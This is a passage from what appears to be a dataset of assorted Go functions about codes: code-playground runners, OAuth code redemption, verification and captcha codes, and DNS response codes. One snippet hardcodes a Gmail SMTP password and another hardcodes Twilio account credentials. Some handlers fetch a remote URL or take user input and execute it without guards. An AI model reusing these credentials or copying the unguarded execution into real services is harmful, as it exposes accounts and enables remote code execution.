{\n\t\treturn nil, code.ErrCodeAlreadyUsed\n\t}\n\n\treturn recoveryCode, nil\n}", "func (controller *playgroundController) RunCode(ctx context.Context, info *pb.RunCodeRequest) (*pb.RunCodeResponse, error) {\n\t// check for correct sdk\n\tif info.Sdk != controller.env.BeamSdkEnvs.ApacheBeamSdk {\n\t\tlogger.Errorf(\"RunCode(): request contains incorrect sdk: %s\\n\", info.Sdk)\n\t\treturn nil, errors.InvalidArgumentError(\"Run code()\", \"incorrect sdk: \"+info.Sdk.String())\n\t}\n\tswitch info.Sdk {\n\tcase pb.Sdk_SDK_UNSPECIFIED, pb.Sdk_SDK_PYTHON, pb.Sdk_SDK_SCIO:\n\t\tlogger.Errorf(\"RunCode(): unimplemented sdk: %s\\n\", info.Sdk)\n\t\treturn nil, errors.InvalidArgumentError(\"Run code()\", \"unimplemented sdk: \"+info.Sdk.String())\n\t}\n\n\tcacheExpirationTime := controller.env.ApplicationEnvs.CacheEnvs().KeyExpirationTime()\n\tpipelineId := uuid.New()\n\n\tlc, err := life_cycle.Setup(info.Sdk, info.Code, pipelineId, controller.env.ApplicationEnvs.WorkingDir())\n\tif err != nil {\n\t\tlogger.Errorf(\"RunCode(): error during setup file system: %s\\n\", err.Error())\n\t\treturn nil, errors.InternalError(\"Run code\", \"Error during setup file system: \"+err.Error())\n\t}\n\n\tcompileBuilder, err := compile_builder.Setup(lc.GetAbsoluteExecutableFilePath(), lc.GetAbsoluteExecutableFilesFolderPath(), info.Sdk, controller.env.BeamSdkEnvs.ExecutorConfig)\n\tif err != nil {\n\t\tlogger.Errorf(\"RunCode(): error during setup run builder: %s\\n\", err.Error())\n\t\treturn nil, errors.InvalidArgumentError(\"Run code\", \"Error during setup compile builder: \"+err.Error())\n\t}\n\n\tif err = utils.SetToCache(ctx, controller.cacheService, pipelineId, cache.Status, pb.Status_STATUS_VALIDATING); err != nil {\n\t\treturn nil, errors.InternalError(\"Run code()\", \"Error during set value to cache: \"+err.Error())\n\t}\n\tif err = controller.cacheService.SetExpTime(ctx, pipelineId, cacheExpirationTime); err != nil {\n\t\tlogger.Errorf(\"%s: RunCode(): cache.SetExpTime(): %s\\n\", pipelineId, err.Error())\n\t\treturn nil, errors.InternalError(\"Run code()\", \"Error during set expiration to cache: \"+err.Error())\n\t}\n\n\t// TODO change using of context.TODO() to context.Background()\n\tgo code_processing.Process(context.TODO(), controller.cacheService, lc, compileBuilder, pipelineId, &controller.env.ApplicationEnvs, &controller.env.BeamSdkEnvs)\n\n\tpipelineInfo := pb.RunCodeResponse{PipelineUuid: pipelineId.String()}\n\treturn &pipelineInfo, nil\n}", "func (controller *playgroundController) RunCode(ctx context.Context, info *pb.RunCodeRequest) (*pb.RunCodeResponse, error) {\n\t// check if we can take a new RunCode request\n\tif !utils.CheckNumOfTheParallelJobs(controller.env.ApplicationEnvs.WorkingDir(), controller.env.BeamSdkEnvs.NumOfParallelJobs()) {\n\t\tlogger.Warnf(\"RunCode(): number of parallel jobs is exceeded\\n\")\n\t\treturn nil, cerrors.ResourceExhaustedError(\"Error during preparing\", \"Number of parallel jobs is exceeded\")\n\t}\n\t// check for correct sdk\n\tif info.Sdk != controller.env.BeamSdkEnvs.ApacheBeamSdk {\n\t\tlogger.Errorf(\"RunCode(): request contains incorrect sdk: %s\\n\", info.Sdk)\n\t\treturn nil, cerrors.InvalidArgumentError(\"Error during preparing\", \"Incorrect sdk. Want to receive %s, but the request contains %s\", controller.env.BeamSdkEnvs.ApacheBeamSdk.String(), info.Sdk.String())\n\t}\n\tswitch info.Sdk {\n\tcase pb.Sdk_SDK_UNSPECIFIED:\n\t\tlogger.Errorf(\"RunCode(): unimplemented sdk: %s\\n\", info.Sdk)\n\t\treturn nil, cerrors.InvalidArgumentError(\"Error during preparing\", \"Sdk is not implemented yet: %s\", info.Sdk.String())\n\t}\n\n\tcacheExpirationTime := controller.env.ApplicationEnvs.CacheEnvs().KeyExpirationTime()\n\tpipelineId := uuid.New()\n\n\tsources := make([]entity.FileEntity, 0)\n\tif len(info.Files) > 0 {\n\t\tfor _, file := range info.Files {\n\t\t\tsources = append(sources, entity.FileEntity{\n\t\t\t\tName: file.Name,\n\t\t\t\tContent: file.Content,\n\t\t\t\tIsMain: file.IsMain,\n\t\t\t\tCntxLine: 1,\n\t\t\t})\n\t\t}\n\t} else {\n\t\tfileName, err := utils.GetFileName(\"\", info.Code, info.Sdk)\n\t\tif err != nil {\n\t\t\treturn nil, cerrors.InternalError(errorTitleRunCode, \"Failed to get default filename\")\n\t\t}\n\t\tsources = append(sources, entity.FileEntity{\n\t\t\tName: fileName,\n\t\t\tContent: info.Code,\n\t\t\tIsMain: true,\n\t\t\tCntxLine: 1,\n\t\t})\n\t}\n\n\temulatorConfiguration := emulators.EmulatorConfiguration{\n\t\tDatasets: info.Datasets,\n\t\tDatasetsPath: controller.env.ApplicationEnvs.DatasetsPath(),\n\t\tKafkaEmulatorExecutablePath: controller.env.ApplicationEnvs.KafkaExecutablePath(),\n\t}\n\n\tlc, err := life_cycle.Setup(info.Sdk, sources, pipelineId, controller.env.ApplicationEnvs.WorkingDir(), controller.env.ApplicationEnvs.PipelinesFolder(), controller.env.BeamSdkEnvs.PreparedModDir(), emulatorConfiguration)\n\tif err != nil {\n\t\tlogger.Errorf(\"RunCode(): error during setup file system: %s\\n\", err.Error())\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Error during setup file system for the code processing: %s\", err.Error())\n\t}\n\n\tif err = utils.SetToCache(controller.cacheService, pipelineId, cache.Status, pb.Status_STATUS_VALIDATING); err != nil {\n\t\tcode_processing.DeleteResources(pipelineId, lc)\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Error during saving status of the code processing\")\n\t}\n\tif err = utils.SetToCache(controller.cacheService, pipelineId, cache.RunOutputIndex, 0); err != nil {\n\t\tcode_processing.DeleteResources(pipelineId, lc)\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Error during saving initial run output\")\n\t}\n\tif err = utils.SetToCache(controller.cacheService, pipelineId, cache.LogsIndex, 0); err != nil {\n\t\tcode_processing.DeleteResources(pipelineId, lc)\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Error during saving value for the logs output\")\n\t}\n\tif err = utils.SetToCache(controller.cacheService, pipelineId, cache.Canceled, false); err != nil {\n\t\tcode_processing.DeleteResources(pipelineId, lc)\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Error during saving initial cancel flag\")\n\t}\n\tif err = controller.cacheService.SetExpTime(ctx, pipelineId, cacheExpirationTime); err != nil {\n\t\tlogger.Errorf(\"%s: RunCode(): cache.SetExpTime(): %s\\n\", pipelineId, err.Error())\n\t\tcode_processing.DeleteResources(pipelineId, lc)\n\t\treturn nil, cerrors.InternalError(\"Error during preparing\", \"Internal error\")\n\t}\n\n\tgo code_processing.Process(context.Background(), controller.cacheService, lc, pipelineId, &controller.env.ApplicationEnvs, &controller.env.BeamSdkEnvs, info.PipelineOptions)\n\n\tpipelineInfo := pb.RunCodeResponse{PipelineUuid: pipelineId.String()}\n\treturn &pipelineInfo, nil\n}", "func failWithRcode(w dns.ResponseWriter, r *dns.Msg, rCode int) {\n m := new(dns.Msg)\n m.SetRcode(r, rCode)\n w.WriteMsg(m)\n m = nil\n}", "func (provider *GoogleProvider) RedeemCode(code string, redirectURL string, state string) (*RedeemResponse, error) {\n\tparams := url.Values{}\n\tparams.Add(\"redirect_uri\", redirectURL)\n\tparams.Add(\"client_id\", config.Config.GoogleClientID)\n\tparams.Add(\"client_secret\", config.Config.GoogleClientSecret)\n\tparams.Add(\"code\", code)\n\tparams.Add(\"grant_type\", \"authorization_code\")\n\n\tvar req *http.Request\n\treq, err := http.NewRequest(\"POST\", provider.pData.RedeemURL.String(), bytes.NewBufferString(params.Encode()))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n\tresp, err := http.DefaultClient.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar body []byte\n\tbody, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\terr = resp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif resp.StatusCode != 200 {\n\t\terr = fmt.Errorf(\"got %d from %q %s\", resp.StatusCode, provider.pData.RedeemURL.String(), body)\n\t\treturn nil, err\n\t}\n\n\tvar jsonResponse struct {\n\t\tAccessToken string `json:\"access_token\"`\n\t\tRefreshToken string `json:\"refresh_token\"`\n\t\tExpiresIn int64 `json:\"expires_in\"`\n\t\tIDToken string `json:\"id_token\"`\n\t}\n\terr = json.Unmarshal(body, &jsonResponse)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tredeemResponse := RedeemResponse{}\n\tredeemResponse.AccessToken = jsonResponse.AccessToken\n\tredeemResponse.RefreshToken = jsonResponse.RefreshToken\n\tredeemResponse.ExpiresOn = time.Now().Add(time.Duration(jsonResponse.ExpiresIn) * time.Second).Truncate(time.Second)\n\tredeemResponse.IDToken = jsonResponse.IDToken\n\treturn &redeemResponse, nil\n}", "func codeHandler(w http.ResponseWriter, r *http.Request) {\n\tif r.Method == \"POST\" {\n\t\tconn, err := net.Dial(\"tcp\", \"localhost:\" + tcpPort)\n\t\tdata := make(map[string]string)\n\t\tdata[\"message\"] = \"\"\n\t\tdata[\"error\"] = \"\"\n\t\tdefer conn.Close()\n\t\tif err != nil {\n\t\t\tdata[\"error\"] = err.Error()\n\t\t\td, err := json.Marshal(data)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Got an error encoding json error\", err.Error())\n\t\t\t}\n\t\t\tfmt.Fprint(w, d)\n\t\t\treturn\n\t\t}\n\t\tcode := r.FormValue(\"code\")\n\t\tconn.Write([]byte(code))\n\t\tconn.Write([]byte(\"\\n\"))\n\t\tconn.Write([]byte(\"exit()\"))\n\t\tconn.Write([]byte(\"\\n\"))\n\t\tbuf, _ := ioutil.ReadAll(conn)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tdata[\"message\"] = string(buf)\n\t\td, err := json.Marshal(data)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"Got an error encoding json message\", err.Error())\n\t\t}\n\t\tfmt.Fprint(w, string(d))\n\t\treturn\n\t}\n\thttp.Error(w, http.StatusText(http.StatusMethodNotAllowed), http.StatusMethodNotAllowed)\n}", "func ApplyCode(target string, scene constk.CaptchaSceneType, options *ApplyCodeOptions) (code string,\n\te cserr.ICSErrCodeError) {\n\n\tstate := model.DbCaptchaState{\n\t\tTarget: target,\n\t\tScene: uint32(scene),\n\t}\n\ttimeNow := time.Now().Unix()\n\tdb := CaptchaDb\n\tnotExists := false\n\tif db.Table(DbCaptchaStateTbNameBase).First(&state, \"target=? AND scene=?\", target, scene).RecordNotFound() {\n\t\t//not exist ok , insert\n\t\tnotExists = true\n\t} else {\n\t\tif state.LastGenTime+int64(options.LimitGenTime) > timeNow {\n\t\t\tlog.Warnf(\"error target:%s gen code hz too high\", target)\n\t\t\te = cserr.ErrCaptcha\n\t\t\treturn\n\t\t}\n\t\t//update\n\t\tnotExists = false\n\t}\n\n\tcharset := util.GetRandCharset(options.Charset)\n\tcode = util.RandomStringWithCharset(options.MaxLength, charset)\n\n\tstate.ExpiredTime = timeNow + int64(options.Timeout)\n\tstate.LastGenTime = timeNow\n\tstate.Code = code\n\tstate.CheckedTimes = options.CheckTimes\n\n\tvar err error\n\tif notExists {\n\t\tstate.Uuid = uuid.NewV4().String()\n\t\terr = CaptchaDb.Table(DbCaptchaStateTbNameBase).Create(&state).Error\n\t} else {\n\t\terr = CaptchaDb.Table(DbCaptchaStateTbNameBase).Where(\"Target=? AND Scene=? \",\n\t\t\ttarget, scene).Updates(model.DbCaptchaState{\n\t\t\tCode: code,\n\t\t\tExpiredTime: state.ExpiredTime,\n\t\t\tLastGenTime: state.LastGenTime,\n\t\t\tCheckedTimes: state.CheckedTimes,\n\t\t}).Error\n\t}\n\tif err != nil {\n\t\tlog.Errorf(err, \"db save captcha sate fail for target:%s\", target)\n\t\te = cserr.ErrCaptcha\n\t\treturn\n\t}\n\n\treturn\n}", "func (p *OktaProvider) Redeem(redirectURL, code string) (*sessions.SessionState, error) {\n\tif code == \"\" {\n\t\treturn nil, ErrBadRequest\n\t}\n\tparams := url.Values{}\n\tparams.Add(\"redirect_uri\", redirectURL)\n\tparams.Add(\"client_id\", p.ClientID)\n\tparams.Add(\"client_secret\", p.ClientSecret)\n\tparams.Add(\"code\", code)\n\tparams.Add(\"grant_type\", \"authorization_code\")\n\tparams.Add(\"scope\", p.Scope)\n\n\tvar response struct {\n\t\tAccessToken string `json:\"access_token\"`\n\t\tRefreshToken string `json:\"refresh_token\"`\n\t\tExpiresIn int64 `json:\"expires_in\"`\n\t\tIDToken string `json:\"id_token\"`\n\t}\n\terr := p.oktaRequest(\"POST\", p.RedeemURL.String(), params, []string{\"action:redeem\"}, nil, &response)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar email string\n\temail, err = p.verifyEmailWithAccessToken(response.AccessToken)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &sessions.SessionState{\n\t\tAccessToken: response.AccessToken,\n\t\tRefreshToken: response.RefreshToken,\n\n\t\tRefreshDeadline: sessions.ExtendDeadline(time.Duration(response.ExpiresIn) * time.Second),\n\t\tLifetimeDeadline: sessions.ExtendDeadline(p.SessionLifetimeTTL),\n\t\tEmail: email,\n\t}, nil\n}", "func (o *ReorderSecurityRealmsOK) Code() int {\n\treturn 200\n}", "func Code(w http.ResponseWriter, r *http.Request) {\n\tfilter, queryErr := getFilter(r)\n\tvar response string\n\tif queryErr != nil {\n\t\tresponse = `QUERY ERROR\\n` + queryErr.Error()\n\t} else {\n\t\tdumpcapOut, dumpcapErr := callDumpcap(filter)\n\t\tif dumpcapErr != nil {\n\t\t\tresponse = dumpcapErr.Error()\n\t\t} else {\n\t\t\tresponse = \"(000)\" + strings.SplitN(string(dumpcapOut), \"(000)\", 2)[1]\n\t\t}\n\t}\n\tw.Write([]byte(response + \"\\n\"))\n}", "func (h *dnsHeader) setRspRCode(que *dnsQuestion) {\n\tif que.qType != aRecord {\n\t\th.flags &= (^errNotImplemented)\n\t\th.flags |= errNotImplemented\n\t} else if que.event == eventNxDomain {\n\t\th.flags &= (^errRefused)\n\t\th.flags |= errRefused\n\t}\n}", "func SendRestoreCodeToUser(mail, code string) {\n\tfrom := \"[email protected]\"\n\tpassword := \"8LYL6GnWpwqgs3k\" // Receiver email address.\n\tto := []string{\n\t\tmail,\n\t} // smtp server configuration.\n\tsmtpServer := smtpServer{host: \"smtp.gmail.com\", port: \"587\"}\n\tmsg := \"Here your code to restore your password: \" + code // Message.\n\tmessage := []byte(msg) // Authentication.\n\tauth := smtp.PlainAuth(\"\", from, password, smtpServer.host) // Sending email.\n\terr := smtp.SendMail(smtpServer.Address(), auth, from, to, message)\n\tif err != nil {\n\t\tfmt.Println(\"Sending mail is broken srry\")\n\t\treturn\n\t}\n}", "func (o *ReinstallMachineDefault) Code() int {\n\treturn o._statusCode\n}", "func WriteCustomCode(response http.ResponseWriter, code int, data ...interface{}) {\n\tGetReply(response, code, data...).Write()\n}", "func RunCode(c *fiber.Ctx) error {\n\t// New incoming code\n\tuserCode := new(model.UserCode)\n\n\t// Parse body into struct\n\tif bodyErr := c.BodyParser(userCode); bodyErr != nil {\n\t\treturn c.Status(400).SendString(bodyErr.Error())\n\t}\n\t//log.Println(userCode.Input)\n\n\tf, fileErr := os.Create(\"./testproblems/linked_lists/user.c\")\n\tif fileErr != nil {\n\t\treturn c.Status(500).SendString(fileErr.Error())\n\t}\n\t_, writeErr := f.WriteString(userCode.Input)\n\tif writeErr != nil {\n\t\treturn c.Status(500).SendString(writeErr.Error())\n\t}\n\n\t// Limit the bash script to only run for 3 seconds\n\tctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)\n\tdefer cancel()\n\n\tcmd := exec.CommandContext(ctx, \"bash\", \"runTest.sh\")\n\n\tcmd.Dir = \"testproblems/linked_lists/\"\n\n\tvar stdout []byte\n\tvar errStdout error\n\tstdoutIn, _ := cmd.StdoutPipe()\n\tstderrIn, _ := cmd.StderrPipe()\n\n\terr := cmd.Start()\n\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\tgo func() {\n\t\tstdout, errStdout = copyAndCapture(stdoutIn)\n\t\twg.Done()\n\t}()\n\tvar stderr []byte\n\tvar errStderr error\n\t_ = stderr\n\t_ = errStderr\n\tstderr, errStderr = copyAndCapture(stderrIn)\n\n\twg.Wait()\n\n\terr = cmd.Wait()\n\n\tif err != nil {\n\t\tlog.Println(\"GOT ERROR:\", err.Error())\n\t\tvar errOutput string\n\t\tif err.Error() == \"exit status 1\" {\n\t\t\terrOutput = err.Error()\n\t\t\tif strings.Contains(errOutput, \"Segmentation fault\") {\n\t\t\t\terrOutput = \"Segmentation Fault: You might have forgot to check for NULL\"\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Println(\"Timed out?\")\n\t\t\terrOutput = \"Process Timed Out (Code exceeded 3 Seconds)\"\n\t\t}\n\t\treturn c.Status(400).JSON(fiber.Map{\"error\": errOutput})\n\t}\n\n\tresult := fiber.Map{\"output\": stdout}\n\treturn c.JSON(result)\n}", "func respondHTTPCodeOnly(w http.ResponseWriter, code int) {\n w.WriteHeader(code)\n}", "func (o *ReplaceServerDefault) Code() int {\n\treturn o._statusCode\n}", "func newCodeResponseWriter(w http.ResponseWriter) *codeResponseWriter {\n\treturn &codeResponseWriter{w, http.StatusOK}\n}", "func (o *UpdateLoginFlowWithCodeMethod) SetResend(v string) {\n\to.Resend = &v\n}", "func runCode(e string, code []byte, fn string, num *int, args []string) []byte {\n\tf, found := extensionMap[e]\n\tif found {\n\t\treturn f(code, fn, num, args)\n\t} else {\n\t\treturn []byte(\"Error: Extension not found.\")\n\t}\n}", "func (s *Session) restoreCode() {\n\ts.mainBody.List = s.lastStmts\n\tdecls := make([]ast.Decl, 0, len(s.file.Decls))\n\tfor _, d := range s.file.Decls {\n\t\tif d, ok := d.(*ast.FuncDecl); ok && d.Name.String() != \"main\" {\n\t\t\tfor _, ld := range s.lastDecls {\n\t\t\t\tif ld, ok := ld.(*ast.FuncDecl); ok && ld.Name.String() == d.Name.String() {\n\t\t\t\t\tdecls = append(decls, ld)\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t\tdecls = append(decls, d)\n\t}\n\ts.file.Decls = decls\n}", "func (r *Realm) ExpireCode(db *Database, uuid string, actor Auditable) (*VerificationCode, error) {\n\tif actor == nil {\n\t\treturn nil, ErrMissingActor\n\t}\n\n\tvar vc VerificationCode\n\tif err := db.db.Transaction(func(tx *gorm.DB) error {\n\t\tif err := tx.\n\t\t\tSet(\"gorm:query_option\", \"FOR UPDATE\").\n\t\t\tWhere(\"realm_id = ? AND uuid = ?\", r.ID, uuid).\n\t\t\tFirst(&vc).\n\t\t\tError; err != nil {\n\t\t\treturn fmt.Errorf(\"failed to get existing verification code: %w\", err)\n\t\t}\n\n\t\t// We don't want to update the expiration time on an already-expired code,\n\t\t// but this also isn't an error, so just return now.\n\t\tif vc.IsExpired() {\n\t\t\treturn nil\n\t\t}\n\n\t\t// It's not possible to expire an already-claimed code.\n\t\tif vc.Claimed {\n\t\t\treturn ErrCodeAlreadyClaimed\n\t\t}\n\n\t\toldExpires := vc.ExpiresAt\n\t\tvc.ExpiresAt = time.Now().UTC()\n\t\tvc.LongExpiresAt = vc.ExpiresAt\n\t\tif err := tx.Save(&vc).Error; err != nil {\n\t\t\treturn fmt.Errorf(\"failed to save verification code: %w\", err)\n\t\t}\n\n\t\taudit := BuildAuditEntry(actor, \"expired verification code\", &vc, r.ID)\n\t\taudit.Diff = stringDiff(oldExpires.Format(time.RFC3339), vc.ExpiresAt.Format(time.RFC3339))\n\t\tif err := tx.Save(audit).Error; err != nil {\n\t\t\treturn fmt.Errorf(\"failed to save audits: %w\", err)\n\t\t}\n\t\treturn nil\n\t}); err != nil {\n\t\treturn nil, err\n\t}\n\treturn &vc, nil\n}", "func Code(code int) {\n\tDefault.ExitCode = code\n\tpanic(msg{Default, \"\"})\n}", "func (code *phoneCodeData) SendCode(theCode string, string, int) error {\n\tfmt.Println(\"SendCode()\");\n\n\tendpoint := \"https://api.twilio.com/2010-04-01/Accounts/AC25c34e873eb0348a2a7b9510f9282319/Messages.json\"\n v := url.Values{}\n v.Set(\"To\", code.phoneName)\n v.Add(\"From\", \"+14342774779\")\n v.Add(\"Body\", \"Your Airwide Code is \" + theCode)\n payload := strings.NewReader(v.Encode())\n\n var username string = \"AC25c34e873eb0348a2a7b9510f9282319\"\n var passwd string = \"c052c7e3068c0f1e64ba5067836b10d4\"\n\n req, _ := http.NewRequest(\"POST\", endpoint, payload)\n req.Header.Add(\"content-type\", \"application/x-www-form-urlencoded\")\n req.Header.Add(\"cache-control\",\"no-cache\")\n req.SetBasicAuth(username, passwd)\n\n res, err := http.DefaultClient.Do(req)\n if err != nil {\n fmt.Println(\"Fatal error occured\")\n }\n\n defer res.Body.Close();\n body, _ := ioutil.ReadAll(res.Body);\n\n fmt.Println(string(body));\n\n // TODO cater for http redirects. https://stackoverflow.com/questions/16673766/basic-http-auth-in-go\n\n\treturn nil;\n}", "func (c cognitoClient) ResendConfirmation(ctx context.Context, username string) error {\n\tlogger := log.With(c.logger, \"method\", \"ResendConfirmation\")\n\n\ts := calculateSecretHash(username, c.appClientID, c.clientSecret)\n\trc := &cognito.ResendConfirmationCodeInput{\n\t\tUsername: aws.String(username),\n\t\tClientId: aws.String(c.appClientID),\n\t\tSecretHash: aws.String(s),\n\t}\n\toutput, err := c.cognitoClient.ResendConfirmationCode(rc)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tlogger.Log(\"Resend confirmation output:\", output)\n\treturn nil\n}", "func (m *PaymentTerm) SetCode(value *string)() {\n err := m.GetBackingStore().Set(\"code\", value)\n if err != nil {\n panic(err)\n }\n}", "func (m *UserExperienceAnalyticsDeviceStartupHistory) SetRestartStopCode(value *string)() {\n err := m.GetBackingStore().Set(\"restartStopCode\", value)\n if err != nil {\n panic(err)\n }\n}", "func (o *WebModifyDefault) Code() int {\n\treturn o._statusCode\n}", "func writeCode(code string) {\n\tfile, err := os.Create(\"./core/main.c\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer file.Close()\n\n\t_, err = io.WriteString(file, code)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func (o *UpdateAntivirusServerDefault) Code() int {\n\treturn o._statusCode\n}", "func runCode(e string, code []byte, fn string) []byte {\n\tf, found := extensionMap[e]\n\tif found {\n\t\treturn f(code, fn)\n\t} else {\n\t\treturn []byte(\"Error: Extension not found.\")\n\t}\n}", "func (o *SchemaObjectsUpdateInternalServerError) Code() int {\n\treturn 500\n}", "func (au *AuthHandler) RequestResetPasswordCode(w http.ResponseWriter, r *http.Request){\n\tw.Header().Add(\"content-type\", \"application/json\")\n\temail := struct {Email\tstring\t`json:\"email\" validate:\"email,required\"`}{}\n\n\tif err := utils.ParseJsonFromRequest(r, &email); err != nil {\n\t\tutils.GetError(err, http.StatusUnprocessableEntity, w)\n\t\treturn\n\t}\n\n\tif err := validate.Struct(email); err != nil {\n\t\tutils.GetError(err, http.StatusBadRequest, w)\n\t\treturn\n\t}\n\n\tuser, err := FetchUserByEmail(bson.M{\"email\": strings.ToLower(email.Email)})\n\tif err != nil {\n\t\tutils.GetError(UserNotFound, http.StatusBadRequest, w)\n\t\treturn\n\t}\n\n\t// check if user already requested for password\n\tif user.PasswordResets != nil {\n\t\tx2x := map[string]interface{}{ \"password_reset_code\" : user.PasswordResets.Token }\n\t\tutils.GetSuccess(\"Password reset code already sent, check your email\", x2x, w)\n\t\treturn\n\t}\n\n\t// Update user collection with UserPasswordReset - WIP\n\t_, token := utils.RandomGen(6, \"d\")\n\n\tuserPasswordReset := map[string]interface{}{\n\t\t\"ip_address\": strings.Split(r.RemoteAddr, \":\")[0],\n\t\t\"token\": token,\n\t\t\"expired_at\": time.Now(),\n\t\t\"updated_at\": time.Now(),\n\t\t\"created_at\": time.Now(),\n\t}\n\n\tid, _ := primitive.ObjectIDFromHex(user.ID)\n\tfilter := bson.M{\"_id\": id}\n\tupdate := bson.M{\"$set\": bson.M{\"password_resets\": userPasswordReset }}\n\n\t// update db;\n\tif _, err := utils.GetCollection(user_collection).UpdateOne(context.Background(), filter, update); err != nil {\n\t\tutils.GetError(err, http.StatusInternalServerError, w)\n\t\treturn\t\t\n\t}\n\n\tmsger := au.mailService.NewMail(\n\t\t[]string{user.Email}, \n\t\t\"Reset Password Code\", service.PasswordReset, \n\t\t&service.MailData{ \n\t\t\tUsername: user.Email, \n\t\t\tCode: userPasswordReset[\"token\"].(string),\n\t\t})\n\n\tif err := au.mailService.SendMail(msger); err != nil {\n\t\tfmt.Printf(\"Error occured while sending mail: %s\", err.Error())\n\t}\n\n\tutils.GetSuccess(\"Password reset code sent\", nil, w)\n}", "func (l *littr) WriteOriginalCode() error {\n\tl.Log(1, \"writing original code\")\n\terr := ioutil.WriteFile(l.filePath, []byte(l.ogCode), 0644)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to write old code to file with %s\", err)\n\t}\n\n\treturn nil\n}", "func (o *PostEquipmentIoExpandersMoidDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateDockerRegistryWebhookByNameUsingPUTInternalServerError) IsCode(code int) bool {\n\treturn code == 500\n}", "func SetRcode(req *dns.Msg, rcode int, do bool) *dns.Msg {\n\tm := new(dns.Msg)\n\tm.Extra = req.Extra\n\tm.SetRcode(req, rcode)\n\tm.RecursionAvailable = true\n\tm.RecursionDesired = true\n\n\tif opt := m.IsEdns0(); opt != nil {\n\t\topt.SetDo(do)\n\t}\n\n\treturn m\n}", "func (db *Database) RecycleVerificationCodes(maxAge time.Duration) (int64, error) {\n\tif maxAge > 0 {\n\t\tmaxAge = -1 * maxAge\n\t}\n\tdeleteBefore := time.Now().UTC().Add(maxAge)\n\t// Null out the codes where this can be done.\n\trtn := db.db.\n\t\tModel(&VerificationCode{}).\n\t\tSelect(\"code\", \"long_code\").\n\t\tWhere(\"expires_at < ? AND long_expires_at < ? AND (code != ? OR long_code != ?)\", deleteBefore, deleteBefore, \"\", \"\").\n\t\tUpdateColumns(map[string]interface{}{\"code\": \"\", \"long_code\": \"\"})\n\treturn rtn.RowsAffected, rtn.Error\n}", "func (o *UpdateGerritListenerByNameUsingPUTInternalServerError) IsCode(code int) bool {\n\treturn code == 500\n}", "func (s *Server) Compiled(ctx context.Context, request *proto.Request) (*proto.Response, error) {\n\t// extract the code URL, args, and stdin from request\n\tcodeURL, args, stdin := request.GetCodeURL(), request.GetArgs(), request.GetStdin()\n\n\t/*\n\t\tCode has to be downloaded in\n\t\t/home/${whoami}/remote/ruby/code-#{time.Now()}.rb\n\t*/\n\n\t// get home directory of current user\n\tcurrentUser, err := user.Current()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// get and format current time for every request\n\tt := time.Now().Format(\"20060102150405\")\n\n\t// generate string for destination (in UNIX based systems)\n\tdestinationString := fmt.Sprintf(\"%s/rpc/ruby/code-%s.rb\", currentUser.HomeDir, t)\n\n\t// download file in the provided destination\n\twget.Wget(codeURL, destinationString)\n\n\t/*\n\t\tIf no arguments were provided, only leave the\n\t\tdestinationString in the args slice otherwise\n\t\tappend location of file to arguments list\n\t*/\n\tif args[0] == \"\" {\n\t\targs = []string{destinationString}\n\t} else {\n\t\targs = append(args, destinationString)\n\t}\n\n\t// get Command struct instance by passing command name and arguments\n\tcmd := exec.Command(\"ruby\", args...)\n\n\t// provide stdin to command\n\tcmd.Stdin = bytes.NewReader(stdin)\n\n\t// store cmd.Stdout in a Bytes buffer\n\tvar Stdout bytes.Buffer\n\tcmd.Stdout = &Stdout\n\n\t// run the command\n\terr = cmd.Run()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// delete the code file\n\terr = os.Remove(destinationString)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\t// return full response\n\treturn &proto.Response{Body: Stdout.Bytes()}, nil\n}", "func (s *BasemumpsListener) ExitCode(ctx *CodeContext) {}", "func (pc *programCode) appendCode(code string) {\n\tpc.funcCode[pc.indentLevel] += code // Append Code to processed indent level\n\n}", "func (o *RefundPaymentByExternalKeyGatewayTimeout) Code() int {\n\treturn 504\n}", "func (w *WithCode) Code() AppErrCode { return w.code }", "func (f *WriteRequest) Code() FrameCode {\n\treturn FrameWrite\n}", "func (app *ApplicationStatus) SetCode(status int) {\n\tapp.Lock()\n\tdefer app.Unlock()\n\n\tapp.code = status\n}", "func (o *UpdateGerritListenerByNameUsingPUTOK) IsCode(code int) bool {\n\treturn code == 200\n}", "func (ws *workingSet) SetCode(addr hash.PKHash, code []byte) error {\n\tif contract, ok := ws.cachedContract[addr]; ok {\n\t\tcontract.SetCode(byteutil.BytesTo32B(hash.Hash256b(code)), code)\n\t\treturn nil\n\t}\n\tcontract, err := ws.getContract(addr)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"failed to SetCode for contract %x\", addr)\n\t}\n\tcontract.SetCode(byteutil.BytesTo32B(hash.Hash256b(code)), code)\n\treturn nil\n}", "func (o *ReorderSecurityRealmsBadRequest) Code() int {\n\treturn 400\n}", "func (code *InterpCode) Release() {\n}", "func (m *AndroidEnrollmentCompanyCode) SetQrCodeContent(value *string)() {\n err := m.GetBackingStore().Set(\"qrCodeContent\", value)\n if err != nil 